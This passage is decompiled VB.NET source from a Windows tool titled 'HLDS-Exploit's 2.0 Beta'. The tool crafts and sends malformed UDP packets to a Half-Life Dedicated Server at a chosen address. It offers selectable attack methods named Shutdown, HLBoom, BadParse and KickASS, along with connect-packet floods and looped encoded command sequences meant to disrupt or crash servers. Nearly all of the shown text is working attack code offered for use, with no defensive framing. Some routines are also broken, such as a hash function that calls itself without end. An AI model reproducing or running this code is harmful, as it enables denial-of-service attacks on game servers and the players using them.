  1693. Me.ForeColor = Color.FromArgb(&HE7, &H4C, 60)
  1694. MyBase.KeyPreview = True
  1695. MyBase.Name = "Form1"
  1696. Me.Text = "HLDS-Exploit's 2.0 Beta"
  1697. AddHandler MyBase.FormClosed, New FormClosedEventHandler(AddressOf Me.Form1_FormClosed)
  1698. AddHandler MyBase.Load, New EventHandler(AddressOf Me.Form1_Load)
  1699. Me.groupBox5.ResumeLayout(False)
  1700. Me.tabPage2.ResumeLayout(False)
  1701. Me.groupBox3.ResumeLayout(False)
  1702. Me.groupBox3.PerformLayout
  1703. Me.groupBox1.ResumeLayout(False)
  1704. Me.groupBox1.PerformLayout
  1705. Me.tabPage1.ResumeLayout(False)
  1706. Me.groupBox2.ResumeLayout(False)
  1707. Me.groupBox2.PerformLayout
  1708. Me.tabControl1.ResumeLayout(False)
  1709. Me.tabPage3.ResumeLayout(False)
  1710. Me.tabPage4.ResumeLayout(False)
  1711. Me.tabPage4.PerformLayout
  1712. Me.tabPage5.ResumeLayout(False)
  1713. MyBase.ResumeLayout(False)
  1714. End Sub
  1715.  
  1716. Public Sub lasds()
  1717. End Sub
  1718.  
  1719. Private Sub LogRichBox_KeyDown(ByVal sender As Object, ByVal e As KeyEventArgs)
  1720. End Sub
  1721.  
  1722. Private Sub LogRichBox_KeyPress(ByVal sender As Object, ByVal e As KeyPressEventArgs)
  1723. End Sub
  1724.  
  1725. Private Sub LogRichBox_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  1726. End Sub
  1727.  
  1728. Private Sub LogRichBox_TextChanged_1(ByVal sender As Object, ByVal e As EventArgs)
  1729. End Sub
  1730.  
  1731. Private Sub LogRichBox_TextChanged_2(ByVal sender As Object, ByVal e As EventArgs)
  1732. End Sub
  1733.  
  1734. Private Sub MessageTxtBox_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  1735. End Sub
  1736.  
  1737. Private Sub method_SelectedIndexChanged_1(ByVal sender As Object, ByVal e As EventArgs)
  1738. If (Me.method.SelectedIndex = 10) Then
  1739. Me.checkBox1.Enabled = False
  1740. Else
  1741. Me.checkBox1.Enabled = True
  1742. End If
  1743. If ((((((Me.method.SelectedIndex = 14) OrElse (Me.method.SelectedIndex = &H12)) OrElse ((Me.method.SelectedIndex = &H10) OrElse (Me.method.SelectedIndex = 15))) OrElse (((Me.method.SelectedIndex = 8) OrElse (Me.method.SelectedIndex = 9)) OrElse ((Me.method.SelectedIndex = &H13) OrElse (Me.method.SelectedIndex = 20)))) OrElse ((((Me.method.SelectedIndex = &H15) OrElse (Me.method.SelectedIndex = &H1B)) OrElse ((Me.method.SelectedIndex = &H16) OrElse (Me.method.SelectedIndex = &H17))) OrElse ((Me.method.SelectedIndex = &H18) OrElse (Me.method.SelectedIndex = &H19)))) OrElse (Me.method.SelectedIndex = &H1A)) Then
  1744. Me.textBox2.Enabled = False
  1745. Me.comboBox1.Enabled = False
  1746. Else
  1747. Me.textBox2.Enabled = True
  1748. Me.comboBox1.Enabled = True
  1749. End If
  1750. If (Me.method.SelectedIndex <> &H1C) Then
  1751. If ((Me.method.SelectedIndex = 5) OrElse (Me.method.SelectedIndex = 15)) Then
  1752. Me.MessageTxtBox.Enabled = True
  1753. Me.comboBox1.Enabled = False
  1754. Else
  1755. Me.MessageTxtBox.Enabled = False
  1756. End If
  1757. If (Me.method.SelectedIndex = 5) Then
  1758. Me.comboBox1.Enabled = True
  1759. End If
  1760. If (Me.method.SelectedIndex = 2) Then
  1761. Me.textBox3.Enabled = True
  1762. Else
  1763. Me.textBox3.Enabled = False
  1764. End If
  1765. End If
  1766. End Sub
  1767.  
  1768. Private Sub NicknamesRichBox_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  1769. Me.Label1.Text = ("Name : " & Enumerable.Count(Of String)((From line In DirectCast(Me.NicknamesRichBox.Lines, IEnumerable(Of String))
  1770. Where Not String.IsNullOrEmpty(line)
  1771. Select line)).ToString)
  1772. End Sub
  1773.  
  1774. Private Sub ProtocolComboBox_SelectedIndexChanged(ByVal sender As Object, ByVal e As EventArgs)
  1775. End Sub
  1776.  
  1777. Public Shared Function RandomRevemuString(ByVal length As Integer) As String
  1778. Return New String(Enumerable.ToArray(Of Char)((From s In Enumerable.Repeat(Of String)("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789qwertyuiopasdfghjklzxcvbnm;'][p=", length) Select s.Chars(Form1.random.Next(s.Length)))))
  1779. End Function
  1780.  
  1781. <DllImport("user32.dll")> _
  1782. Public Shared Function ReleaseCapture() As Boolean
  1783. End Function
  1784.  
  1785. Public Function revHash(ByVal Str As String) As UInt32
  1786. Dim num As Integer = 0
  1787. Dim num2 As Integer = &H4E67C6A7
  1788. Dim str As String = Str
  1789. Dim num3 As Integer = num
  1790. Dim num4 As Integer = 1
  1791. Dim num5 As Integer = (num3 + num4)
  1792. Dim i As Integer = str.Chars(num3)
  1793. Do While (i > 0)
  1794. num2 = (num2 Xor (((num2 >> 2) + i) + (&H20 * num2)))
  1795. i = Str.Chars(num5++)
  1796. Loop
  1797. Return Me.revHash(Str)
  1798. End Function
  1799.  
  1800. <DllImport("user32.dll")> _
  1801. Public Shared Function SendMessage(ByVal hWnd As IntPtr, ByVal Msg As Integer, ByVal wParam As Integer, ByVal lParam As Integer) As Integer
  1802. End Function
  1803.  
  1804. Public Function SendMessage(ByVal IP As String, ByVal UserInfo As String, ByVal Message As String, ByVal Protocol As String, ByVal SteamIDCertificate As Byte(), ByVal Disconnect As Boolean) As String
  1805. Dim str As String
  1806. Try
  1807. Dim num2 As Integer
  1808. Dim num3 As Integer
  1809. Dim num4 As Integer
  1810. Dim str5 As String
  1811. Dim strArray As String() = IP.Split(New Char() { ":"c })
  1812. Dim remoteEP As New IPEndPoint(IPAddress.Parse(strArray(0)), Convert.ToInt32(strArray(1)))
  1813. Dim socket As New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
  1814. If (Me.comboBox1.SelectedIndex = 2) Then
  1815. Dim num As Integer
  1816. Dim ipString As String = ""
  1817. Dim address As IPAddress
  1818. For Each address In Dns.GetHostEntry(Dns.GetHostName).AddressList
  1819. If (address.AddressFamily.ToString = "InterNetwork") Then
  1820. ipString = address.ToString
  1821. End If
  1822. Next
  1823. If (Integer.TryParse(Me.textBox11.Text, num) AndAlso (num > 0)) Then
  1824. socket.Bind(New IPEndPoint(IPAddress.Parse(ipString), num))
  1825. End If
  1826. End If
  1827. If (Integer.TryParse(Me.textBox12.Text, num2) AndAlso (num2 > 0)) Then
  1828. socket.SendTimeout = num2
  1829. socket.ReceiveTimeout = num2
  1830. End If
  1831. socket.Connect(remoteEP)
  1832. Dim list As New List(Of Byte)
  1833. If (Me.method.SelectedIndex = &H20) Then
  1834. num3 = 1
  1835. Do While (num3 <= &H1388)
  1836. list.AddRange(DirectCast(Me.Data.Connect, IEnumerable(Of Byte)))
  1837. list.AddRange(DirectCast(Encoding.ASCII.GetBytes(Protocol), IEnumerable(Of Byte)))
  1838. list.AddRange(DirectCast(New Byte() { &H20, &H22 }, IEnumerable(Of Byte)))
  1839. If Not Me.checkBox18.Checked Then
  1840. list.AddRange(DirectCast(Encoding.Default.GetBytes(UserInfo), IEnumerable(Of Byte)))
  1841. Else
  1842. list.AddRange(DirectCast(Encoding.UTF8.GetBytes(UserInfo), IEnumerable(Of Byte)))
  1843. End If
  1844. list.AddRange(DirectCast(New Byte() { 10 }, IEnumerable(Of Byte)))
  1845. list.AddRange(DirectCast(SteamIDCertificate, IEnumerable(Of Byte)))
  1846. socket.Send(list.ToArray)
  1847. num3 += 1
  1848. Loop
  1849. End If
  1850. Dim list2 As New List(Of Byte)
  1851. Dim buffer As Byte() = New Byte(&H800 - 1) {}
  1852. If (Me.comboBox3.SelectedIndex = 0) Then
  1853. socket.Send(Me.Data.Steam)
  1854. End If
  1855. If (Me.comboBox3.SelectedIndex = 1) Then
  1856. socket.Send(Me.Data.Valve)
  1857. End If
  1858. If (Me.comboBox3.SelectedIndex = 2) Then
  1859. socket.Send(Me.Data.Null)
  1860. End If
  1861. socket.Receive(buffer)
  1862. If Me.checkBox10.Checked Then
  1863. socket.Send(Me.Data.Check)
  1864. End If
  1865. Dim s As String = Encoding.ASCII.GetString(buffer).Split(New Char() { " "c })(1)
  1866. list.AddRange(DirectCast(Me.Data.Connect, IEnumerable(Of Byte)))
  1867. If (Me.method.SelectedIndex = 15) Then
  1868. list2.AddRange(DirectCast(Me.Data.Check2, IEnumerable(Of Byte)))
  1869. list2.AddRange(DirectCast(Encoding.Default.GetBytes(Me.MessageTxtBox.Text), IEnumerable(Of Byte)))
  1870. socket.Send(list2.ToArray)
  1871. socket.Receive(buffer)
  1872. End If
  1873. If (Me.method.SelectedIndex = &H15) Then
  1874. num3 = 1
  1875. Do While (num3 <= &H13)
  1876. list2.AddRange(DirectCast(Me.Data.KickASS, IEnumerable(Of Byte)))
  1877. num3 += 1
  1878. Loop
  1879. End If
  1880. If (Me.method.SelectedIndex = &H1B) Then
  1881. list2.AddRange(DirectCast(Me.Data.HLBoom, IEnumerable(Of Byte)))
  1882. socket.Send(list2.ToArray)
  1883. socket.Receive(buffer)
  1884. End If
  1885. list.AddRange(DirectCast(Encoding.ASCII.GetBytes(Protocol), IEnumerable(Of Byte)))
  1886. list.AddRange(DirectCast(New Byte() { &H20 }, IEnumerable(Of Byte)))
  1887. list.AddRange(DirectCast(Encoding.ASCII.GetBytes(s), IEnumerable(Of Byte)))
  1888. list.AddRange(DirectCast(New Byte() { &H20, &H22 }, IEnumerable(Of Byte)))
  1889. If Not Me.checkBox18.Checked Then
  1890. list.AddRange(DirectCast(Encoding.Default.GetBytes(UserInfo), IEnumerable(Of Byte)))
  1891. Else
  1892. list.AddRange(DirectCast(Encoding.UTF8.GetBytes(UserInfo), IEnumerable(Of Byte)))
  1893. End If
  1894. list.AddRange(DirectCast(New Byte() { 10 }, IEnumerable(Of Byte)))
  1895. list.AddRange(DirectCast(SteamIDCertificate, IEnumerable(Of Byte)))
  1896. socket.Send(list.ToArray)
  1897. If Me.checkBox16.Checked Then
  1898. Me.LogRichBox.AppendText(String.Concat(New Object() { DateTime.Now.Hour.ToString, ":", DateTime.Now.Minute, ":", DateTime.Now.Second, " ", Encoding.ASCII.GetString(list.ToArray).Replace("?", String.Empty), Environment.NewLine }))
  1899. Me.LogRichBox.SelectionStart = Me.LogRichBox.Text.Length
  1900. Me.LogRichBox.ScrollToCaret
  1901. End If
  1902. If (Me.method.SelectedIndex = 14) Then
  1903. list2.AddRange(DirectCast(Me.Data.Failds, IEnumerable(Of Byte)))
  1904. socket.Send(list2.ToArray)
  1905. socket.Receive(buffer)
  1906. End If
  1907. If (Me.method.SelectedIndex = &H10) Then
  1908. list2.AddRange(DirectCast(Me.Data.SV_ParseCvarData, IEnumerable(Of Byte)))
  1909. End If
  1910. If (Me.method.SelectedIndex = &H23) Then
  1911. Using reader As StreamReader = New StreamReader(New FileStream("settings/packets_func.txt", FileMode.Open, FileAccess.Read), Encoding.UTF8)
  1912. Dim str4 As String = reader.ReadToEnd
  1913. list2.AddRange(DirectCast(Encoding.Default.GetBytes(str4), IEnumerable(Of Byte)))
  1914. socket.Send(list2.ToArray)
  1915. End Using
  1916. End If
  1917. If (Me.method.SelectedIndex = &H1F) Then
  1918. list2.AddRange(DirectCast(Me.Data.SV_ParseConsistencyResponse, IEnumerable(Of Byte)))
  1919. socket.Send(list2.ToArray)
  1920. socket.Receive(buffer)
  1921. End If
  1922. If (Me.method.SelectedIndex = &H11) Then
  1923. list2.AddRange(DirectCast(Me.Data.FuckDproto, IEnumerable(Of Byte)))
  1924. socket.Send(list2.ToArray)
  1925. socket.Receive(buffer)
  1926. End If
  1927. If (Me.method.SelectedIndex = &H13) Then
  1928. list2.AddRange(DirectCast(Me.Data.JOS2, IEnumerable(Of Byte)))
  1929. socket.Send(list2.ToArray)
  1930. socket.Receive(buffer)
  1931. End If
  1932. If (Me.method.SelectedIndex = &H12) Then
  1933. socket.Send(Me.Data.FVU)
  1934. socket.Send(list2.ToArray)
  1935. socket.Receive(buffer)
  1936. End If
  1937. If (Me.method.SelectedIndex = 20) Then
  1938. list2.AddRange(DirectCast(Me.Data.JOS32, IEnumerable(Of Byte)))
  1939. socket.Send(list2.ToArray)
  1940. socket.Receive(buffer)
  1941. End If
  1942. If (Me.method.SelectedIndex = 8) Then
  1943. list2.AddRange(DirectCast(Me.Data.SV_ParseCvarData, IEnumerable(Of Byte)))
  1944. socket.Send(list2.ToArray)
  1945. socket.Receive(buffer)
  1946. End If
  1947. If (Me.method.SelectedIndex = &H16) Then
  1948. list2.AddRange(DirectCast(Me.Data.Unknown, IEnumerable(Of Byte)))
  1949. socket.Send(list2.ToArray)
  1950. socket.Receive(buffer)
  1951. End If
  1952. If (Me.method.SelectedIndex = &H17) Then
  1953. list2.AddRange(DirectCast(Me.Data.Shutdown, IEnumerable(Of Byte)))
  1954. socket.Send(list2.ToArray)
  1955. socket.Receive(buffer)
  1956. End If
  1957. If (Me.method.SelectedIndex = &H18) Then
  1958. list2.AddRange(DirectCast(Me.Data.BadParse, IEnumerable(Of Byte)))
  1959. socket.Send(list2.ToArray)
  1960. socket.Receive(buffer)
  1961. Else
  1962. If (Me.method.SelectedIndex = &H21) Then
  1963. num4 = 1
  1964. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  1965. Form1.holdV = Form1.fix2(num4, 1)
  1966. list2.Clear
  1967. Dim list3 As List(Of Byte) = list2
  1968. Dim buffer2 As Byte() = New Byte(15 - 1) {}
  1969. buffer2(0) = 1
  1970. buffer2(14) = 3
  1971. list3.AddRange(DirectCast(buffer2, IEnumerable(Of Byte)))
  1972. str5 = """caatttt; testwait; -150003123; wait; +5000033; wait; testcaatttt; wait; +35000033; testwait; -5000033;' + 'wait; +caatttt; wait; -5000033; test2+5000033; wait; testcaatttt; wait; +35000033; test2 testtest test test testtest test testtest test+5000033; wait; testcaatttt; wait; +35000033; test2 testtest test testtestwait"""
  1973. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(str5), IEnumerable(Of Byte)))
  1974. list2.AddRange(DirectCast(New Byte(8 - 1) {}, IEnumerable(Of Byte)))
  1975. socket.Send(Me.COM_Munge(list2.ToArray))
  1976. list2.Clear
  1977. Dim list4 As List(Of Byte) = list2
  1978. Dim buffer3 As Byte() = New Byte(15 - 1) {}
  1979. buffer3(0) = 2
  1980. buffer3(14) = 3
  1981. list4.AddRange(DirectCast(buffer3, IEnumerable(Of Byte)))
  1982. Dim str6 As String = """caatttt; testwait; -150003123; wait; +5000033; wai+5000033; wait; testcaatttt; wait; +35000033; test2 testtest test testt; testcaatttt; wait;' + '+5000033; wait; testcaatttt; wait; +15000+5000033; wait; testcaatttt; wait; +1+5000033; wait; testcaatttt; wait; +35000033; test2 testtest test test5000033; test2 testtest test test0; test2 testtest test test+35000033"
  1983. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(str6), IEnumerable(Of Byte)))
  1984. list2.AddRange(DirectCast(New Byte(8 - 1) {}, IEnumerable(Of Byte)))
  1985. socket.Send(Me.COM_Munge(list2.ToArray))
  1986. list2.Clear
  1987. Dim list5 As List(Of Byte) = list2
  1988. Dim buffer4 As Byte() = New Byte(15 - 1) {}
  1989. buffer4(0) = 3
  1990. buffer4(14) = 3
  1991. list5.AddRange(DirectCast(buffer4, IEnumerable(Of Byte)))
  1992. Dim str7 As String = """caatttt; testwait; -150003123; wait; +5000033; wait; test2 +5000033; wait; testcaatttt; wait; +35000033;test2+5000033; wait; testcaatttt; wait;' + '+35000033; test2 testtest test testtesttest testtest test testtesttest test testtest testtestcaatttt+5000033; wait;test2test+5000033; wait; testcaatttt; wait; +35000033;' + 'test2 testtest test testtest testtest test testtest testtestcaatttt; wait; +35000033; + test2 testtest test test; wait; +35000033"
  1993. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(str7), IEnumerable(Of Byte)))
  1994. list2.AddRange(DirectCast(New Byte(8 - 1) {}, IEnumerable(Of Byte)))
  1995. socket.Send(Me.COM_Munge(list2.ToArray))
  1996. list2.Clear
  1997. num4 += 1
  1998. Loop
  1999. End If
  2000. If (Me.method.SelectedIndex = 10) Then
  2001. list2.AddRange(DirectCast(New Byte() { 0, 0, 0, 0, 0, 0, 0, 0, 3, &H72, &H65, &H63, &H6F, 110, 110, &H65, &H63, &H74, 0 }, IEnumerable(Of Byte)))
  2002. Else
  2003. list2.AddRange(DirectCast(Me.Data.New, IEnumerable(Of Byte)))
  2004. socket.Send(list2.ToArray)
  2005. list2.Clear
  2006. If Me.checkBox13.Checked Then
  2007. list2.AddRange(DirectCast(New Byte() { 2, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2008. socket.Send(Me.COM_Munge(list2.ToArray))
  2009. socket.Receive(buffer)
  2010. list2.Clear
  2011. list2.AddRange(DirectCast(New Byte() { 2, 0, 0, 0, 2, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2012. socket.Send(Me.COM_Munge(list2.ToArray))
  2013. list2.Clear
  2014. list2.AddRange(DirectCast(New Byte() { 3, 0, 0, 0, 2, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2015. socket.Send(Me.COM_Munge(list2.ToArray))
  2016. list2.Clear
  2017. list2.AddRange(DirectCast(New Byte() { 4, 0, 0, 0, 2, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2018. socket.Send(Me.COM_Munge(list2.ToArray))
  2019. socket.Receive(buffer)
  2020. list2.Clear
  2021. list2.AddRange(DirectCast(New Byte() { 5, 0, 0, 0, 3, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2022. socket.Send(Me.COM_Munge(list2.ToArray))
  2023. socket.Receive(buffer)
  2024. list2.Clear
  2025. list2.AddRange(DirectCast(New Byte() { 6, 0, 0, 0, 4, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2026. socket.Send(Me.COM_Munge(list2.ToArray))
  2027. list2.Clear
  2028. list2.AddRange(DirectCast(New Byte() { 7, 0, 0, 0, 4, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2029. socket.Send(Me.COM_Munge(list2.ToArray))
  2030. socket.Receive(buffer)
  2031. list2.Clear
  2032. list2.AddRange(DirectCast(New Byte() { 8, 0, 0, 0, 5, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2033. socket.Send(Me.COM_Munge(list2.ToArray))
  2034. list2.Clear
  2035. list2.AddRange(DirectCast(New Byte() { 6, 0, 0, 0, 7, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2036. socket.Send(Me.COM_Munge(list2.ToArray))
  2037. socket.Receive(buffer)
  2038. list2.Clear
  2039. list2.AddRange(DirectCast(New Byte() { 9, 0, 0, 0, 7, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2040. socket.Send(Me.COM_Munge(list2.ToArray))
  2041. list2.Clear
  2042. list2.AddRange(DirectCast(New Byte() { 10, 0, 0, 0, 7, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2043. socket.Send(Me.COM_Munge(list2.ToArray))
  2044. list2.Clear
  2045. list2.AddRange(DirectCast(New Byte() { 8, 0, 0, 0, 9, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2046. socket.Send(Me.COM_Munge(list2.ToArray))
  2047. socket.Receive(buffer)
  2048. list2.Clear
  2049. list2.AddRange(DirectCast(New Byte() { 11, 0, 0, &H80, 9, 0, 0, 0, 3, &H73, &H65, 110, 100, &H72, &H65, &H73, 0, 3, &H5F, &H30, 50, &H31, 50, &H30, &H30, &H31, 50, &H30, &H31, &H34, 50, &H33, 50, &H34, &H35, &H36, 50, &H39, 0 }, IEnumerable(Of Byte)))
  2050. socket.Send(Me.COM_Munge(list2.ToArray))
  2051. list2.Clear
  2052. list2.AddRange(DirectCast(New Byte() { 12, 0, 0, 0, 9, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2053. socket.Send(Me.COM_Munge(list2.ToArray))
  2054. socket.Receive(buffer)
  2055. list2.Clear
  2056. list2.AddRange(DirectCast(New Byte() { 13, 0, 0, 0, 10, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2057. socket.Send(Me.COM_Munge(list2.ToArray))
  2058. socket.Receive(buffer)
  2059. list2.Clear
  2060. list2.AddRange(DirectCast(New Byte() { 14, 0, 0, 0, 11, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2061. socket.Send(Me.COM_Munge(list2.ToArray))
  2062. socket.Receive(buffer)
  2063. list2.Clear
  2064. list2.AddRange(DirectCast(New Byte() { 15, 0, 0, 0, 12, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2065. socket.Send(Me.COM_Munge(list2.ToArray))
  2066. list2.Clear
  2067. list2.AddRange(DirectCast(New Byte() { &H10, 0, 0, 0, 11, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2068. socket.Send(Me.COM_Munge(list2.ToArray))
  2069. socket.Receive(buffer)
  2070. list2.Clear
  2071. list2.AddRange(DirectCast(New Byte() { &H11, 0, 0, 0, 13, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2072. socket.Send(Me.COM_Munge(list2.ToArray))
  2073. socket.Receive(buffer)
  2074. list2.Clear
  2075. list2.AddRange(DirectCast(New Byte() { &H12, 0, 0, 0, 14, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2076. socket.Send(Me.COM_Munge(list2.ToArray))
  2077. list2.Clear
  2078. list2.AddRange(DirectCast(New Byte() { &H13, 0, 0, 0, 14, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2079. socket.Send(Me.COM_Munge(list2.ToArray))
  2080. socket.Receive(buffer)
  2081. list2.Clear
  2082. list2.AddRange(DirectCast(New Byte() { 20, 0, 0, 0, 15, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2083. socket.Send(Me.COM_Munge(list2.ToArray))
  2084. socket.Receive(buffer)
  2085. list2.Clear
  2086. list2.AddRange(DirectCast(New Byte() { &H15, 0, 0, 0, &H10, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2087. socket.Send(Me.COM_Munge(list2.ToArray))
  2088. list2.Clear
  2089. list2.AddRange(DirectCast(New Byte() { &H16, 0, 0, 0, &H10, 0, 0, &H80, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2090. socket.Send(Me.COM_Munge(list2.ToArray))
  2091. socket.Receive(buffer)
  2092. list2.Clear
  2093. list2.AddRange(DirectCast(New Byte() { &H17, 0, 0, 0, &H11, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2094. socket.Send(Me.COM_Munge(list2.ToArray))
  2095. list2.Clear
  2096. list2.AddRange(DirectCast(New Byte() { &H18, 0, 0, 0, &H11, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1 }, IEnumerable(Of Byte)))
  2097. socket.Send(Me.COM_Munge(list2.ToArray))
  2098. socket.Receive(buffer)
  2099. list2.Clear
  2100. list2.AddRange(DirectCast(New Byte() { &H1B, 0, 0, 0, &H12, 0, 0, &H80, 2, 7, &HA1, 2, &H19, 80, &H1B, &H20, &HF3, 1 }, IEnumerable(Of Byte)))
  2101. socket.Send(Me.COM_Munge(list2.ToArray))
  2102. list2.Clear
  2103. list2.AddRange(DirectCast(New Byte() { &H1C, 0, 0, 0, &H12, 0, 0, &H80, 2, 7, &HED, 5, &H19, 80, &H1C, &H20, 3, 2 }, IEnumerable(Of Byte)))
  2104. socket.Send(Me.COM_Munge(list2.ToArray))
  2105. list2.Clear
  2106. list2.AddRange(DirectCast(New Byte() { &H1D, 0, 0, 0, &H12, 0, 0, &H80, 2, 7, &H4A, 4, &H19, 80, &H1D, &H20, &HF3, 1 }, IEnumerable(Of Byte)))
  2107. socket.Send(Me.COM_Munge(list2.ToArray))
  2108. socket.Receive(buffer)
  2109. list2.Clear
  2110. End If
  2111. End If
  2112. End If
  2113. list2.Clear
  2114. list2.Add(2)
  2115. Dim buffer6 As Byte() = New Byte(3 - 1) {}
  2116. buffer6(2) = &H80
  2117. list2.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2118. list2.AddRange(Enumerable.Take(Of Byte)(DirectCast(buffer, IEnumerable(Of Byte)), 2))
  2119. list2.AddRange(DirectCast(New Byte(2 - 1) {}, IEnumerable(Of Byte)))
  2120. If (Me.method.SelectedIndex = 0) Then
  2121. num4 = 1
  2122. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2123. Form1.holdV = Form1.fix2(num4, 1)
  2124. list.Clear
  2125. buffer6 = New Byte() { 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 100, &H6C, &H66, &H69, &H6C, &H65, &H20, &H63, &H73, &H5F, &H68, &H61, &H76, &H61, 110, &H61, &H2E, &H77, &H61, 100, 0, 3, 100, &H6C, &H66, &H69, &H6C, &H65, &H20, &H63, &H73, &H5F, &H68, &H61, &H76, &H61, 110, &H61, &H2E, &H77, &H61, 100, 0, 3, 100, &H6C, &H66, &H69, &H6C, &H65, &H20, &H63, &H73, &H5F, &H68, &H61, &H76, &H61, 110, &H61, &H2E, &H77, &H61, 100, 0, 3, 100, &H6C, &H66, &H69, &H6C, &H65, &H20, &H63, &H73, &H5F, &H68, &H61, &H76, &H61, 110, &H61, &H2E, &H77, &H61, 100, 0 }
  2126. buffer6(0) = Form1.fixbug(num4, 1)
  2127. buffer6(1) = CByte(Form1.holdV)
  2128. list.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2129. socket.Send(Me.COM_Munge(list.ToArray))
  2130. list.Clear
  2131. num4 += 1
  2132. Loop
  2133. ElseIf (Me.method.SelectedIndex = 1) Then
  2134. num4 = 1
  2135. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2136. Form1.holdV = Form1.fix2(num4, 1)
  2137. list2.Clear
  2138. buffer6 = New Byte() { 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 100, &H6C, &H66, &H69, &H6C, &H65, &H20, &H68, &H61, &H6C, &H66, &H6C, &H69, &H66, &H65, &H2E, &H77, &H61, 100, 0, 3, 100, &H6C, &H66, &H69, &H6C, &H65, &H20, &H68, &H61, &H6C, &H66, &H6C, &H69, &H66, &H65, &H2E, &H77, &H61, 100, 0, 3, 100, &H6C, &H66, &H69, &H6C, &H65, &H20, &H68, &H61, &H6C, &H66, &H6C, &H69, &H66, &H65, &H2E, &H77, &H61, 100, 0, 3, 100, &H6C, &H66, &H69, &H6C, &H65, &H20, &H68, &H61, &H6C, &H66, &H6C, &H69, &H66, &H65, &H2E, &H77, &H61, 100, 0 }
  2139. buffer6(0) = Form1.fixbug(num4, 1)
  2140. buffer6(1) = CByte(Form1.holdV)
  2141. list2.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2142. socket.Send(Me.COM_Munge(list2.ToArray))
  2143. list2.Clear
  2144. num4 += 1
  2145. Loop
  2146. ElseIf (Me.method.SelectedIndex = 2) Then
  2147. num4 = 1
  2148. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2149. Form1.holdV = Form1.fix2(num4, 1)
  2150. list2.Clear
  2151. buffer6 = New Byte() { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, &H73, &H70, &H61, &H77, 110, &H20 }
  2152. buffer6(0) = Form1.fixbug(num4, 1)
  2153. buffer6(1) = CByte(Form1.holdV)
  2154. list2.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2155. str5 = (Me.textBox3.Text & " " & Me.textBox3.Text)
  2156. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(str5), IEnumerable(Of Byte)))
  2157. list2.AddRange(DirectCast(New Byte(3 - 1) {}, IEnumerable(Of Byte)))
  2158. socket.Send(Me.COM_Munge(list2.ToArray))
  2159. list2.Clear
  2160. num4 += 1
  2161. Loop
  2162. End If
  2163. If (Me.method.SelectedIndex = 3) Then
  2164. num4 = 1
  2165. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2166. Form1.holdV = Form1.fix2(num4, 1)
  2167. list2.Clear
  2168. buffer6 = New Byte() { 0, 0, 30, 0, 0, 0, 0, 0, 0, 3, &H73, &H65, 110, 100, &H72, &H65, &H73, &H20, 0, 3, 0, 3, &H73, &H65, 110, 100, &H72, &H65, &H73, &H20, 0, 3, 0, 3, &H73, &H65, 110, 100, &H72, &H65, &H73, &H20, 0, 3, 0, 3, &H73, &H65, 110, 100, &H72, &H65, &H73, &H20, 0, 3, 0 }
  2169. buffer6(0) = Form1.fixbug(num4, 1)
  2170. buffer6(1) = CByte(Form1.holdV)
